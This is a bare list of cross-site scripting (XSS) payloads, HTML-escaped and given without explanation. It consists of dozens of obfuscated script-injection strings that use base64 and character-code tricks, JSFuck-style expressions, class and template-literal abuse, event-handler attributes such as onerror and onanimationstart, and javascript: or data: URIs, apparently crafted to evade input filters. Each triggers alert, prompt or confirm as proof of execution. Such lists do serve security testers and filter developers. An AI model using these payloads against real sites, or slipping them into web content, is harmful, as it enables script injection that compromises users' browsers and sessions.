    &lt;script&gt;prompt(1)&lt;/script&gt;
    &lt;script&gt;confirm(1)&lt;/script&gt;
    &lt;script&gt;
    var fn=window[490837..toString(1&lt;&lt;5)];
    fn(atob(&#39;YWxlcnQoMSk=&#39;));
    &lt;/script&gt;
    &lt;script&gt;
    var fn=window[String.fromCharCode(101,118,97,108)];
    fn(atob(&#39;YWxlcnQoMSk=&#39;));
    &lt;/script&gt;
    &lt;script&gt;
    var fn=window[atob(&#39;ZXZhbA==&#39;)];
    fn(atob(&#39;YWxlcnQoMSk=&#39;));
    &lt;/script&gt;
    &lt;script&gt;window[490837..toString(1&lt;&lt;5)](atob(&#39;YWxlcnQoMSk=&#39;))&lt;/script&gt;
    &lt;script&gt;this[490837..toString(1&lt;&lt;5)](atob(&#39;YWxlcnQoMSk=&#39;))&lt;/script&gt;
    &lt;script&gt;this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])&lt;/script&gt;
    &lt;script&gt;this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))&lt;/script&gt;
    &lt;script&gt;&#39;str1ng&#39;.replace(/1/,alert)&lt;/script&gt;
    &lt;script&gt;&#39;bbbalert(1)cccc&#39;.replace(/a\w{4}\(\d\)/,eval)&lt;/script&gt;
    &lt;script&gt;&#39;a1l2e3r4t6&#39;.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })&lt;/script&gt;
    &lt;script&gt;eval(&#39;\\u&#39;+&#39;0061&#39;+&#39;lert(1)&#39;)&lt;/script&gt;
    &lt;script&gt;throw~delete~typeof~prompt(1)&lt;/script&gt;
    &lt;script&gt;delete[a=alert]/prompt a(1)&lt;/script&gt;
    &lt;script&gt;delete[a=this[atob(&#39;YWxlcnQ=&#39;)]]/prompt a(1)&lt;/script&gt;
    &lt;script&gt;(()=&gt;{return this})().alert(1)&lt;/script&gt;
    &lt;script&gt;new function(){new.target.constructor(&#39;alert(1)&#39;)();}&lt;/script&gt;
    &lt;script&gt;Reflect.construct(function(){new.target.constructor(&#39;alert(1)&#39;)()},[])&lt;/script&gt;
    &lt;link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg&gt;
    &lt;link rel=&#34;import&#34; href=&#34;data:x,&lt;script&gt;alert(1)&lt;/script&gt;
    &lt;script&gt;Array.from`1${alert}3${window}2`&lt;/script&gt;
    &lt;script&gt;!{x(){alert(1)}}.x()&lt;/script&gt;
    &lt;script&gt;Array.from`${eval}alert\`1\``&lt;/script&gt;
    &lt;script&gt;Array.from([1],alert)&lt;/script&gt;
    &lt;script&gt;Promise.reject(&#34;1&#34;).then(null,alert)&lt;/script&gt;
    &lt;svg &lt;/onload =&#34;1&gt; (_=alert,_(1)) &#34;&#34;&gt;
    javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload=&#39;+/&#34;/+/onmouseover=1/+/[*/[]/+alert(1)//&#39;&gt;
    &lt;marquee loop=1 width=0 onfinish=alert(1)&gt;
    &lt;p onbeforescriptexecute=&#34;alert(1)&#34;&gt;&lt;svg&gt;&lt;script&gt;\&lt;/p&gt;
    &lt;img onerror=alert(1) src &lt;u&gt;&lt;/u&gt;
    &lt;videogt;&lt;source onerror=javascript:prompt(911)gt;
    &lt;base target=&#34;&lt;script&gt;alert(1)&lt;/script&gt;&#34;&gt;&lt;a href=&#34;javascript:name&#34;&gt;CLICK&lt;/a&gt;
    &lt;base href=&#34;javascript:/&#34;&gt;&lt;a href=&#34;**/alert(1)&#34;&gt;&lt;base href=&#34;javascript:/&#34;&gt;&lt;a href=&#34;**/alert(1)&#34;&gt;
    &lt;style&gt;@KeyFrames x{&lt;/style&gt;&lt;div style=animation-name:x onanimationstart=alert(1)&gt; &lt;
    &lt;script&gt;```${``[class extends[alert``]{}]}```&lt;/script&gt;
    &lt;script&gt;[class extends[alert````]{}]&lt;/script&gt;
    &lt;script&gt;throw new class extends Function{}(&#39;alert(1)&#39;)``&lt;/script&gt;
    &lt;script&gt;x=new class extends Function{}(&#39;alert(1)&#39;); x=new x;&lt;/script&gt;
    &lt;script&gt;new class extends alert(1){}&lt;/script&gt;
    &lt;script&gt;new class extends class extends class extends class extends alert(1){}{}{}{}&lt;/script&gt;
    &lt;script&gt;new Image()[unescape(&#39;%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74&#39;)][atob(&#39;ZGVmYXVsdFZpZXc=&#39;)][8680439..toString(30)](1)&lt;/script&gt;
    &lt;script src=data:,\u006fnerror=\u0061lert(1)&gt;&lt;/script&gt;
    &#34;&gt;&lt;svg&gt;&lt;script/xlink:href=&#34;data:,alert(1)
    &lt;svg&gt;&lt;script/xlink:href=data:,alert(1)&gt;&lt;/script&gt;
    &lt;frameset/onpageshow=alert(1)&gt;
    &lt;div onactivate=alert(&#39;Xss&#39;) id=xss style=overflow:scroll&gt;
    &lt;div onfocus=alert(&#39;xx&#39;) id=xss style=display:table&gt;

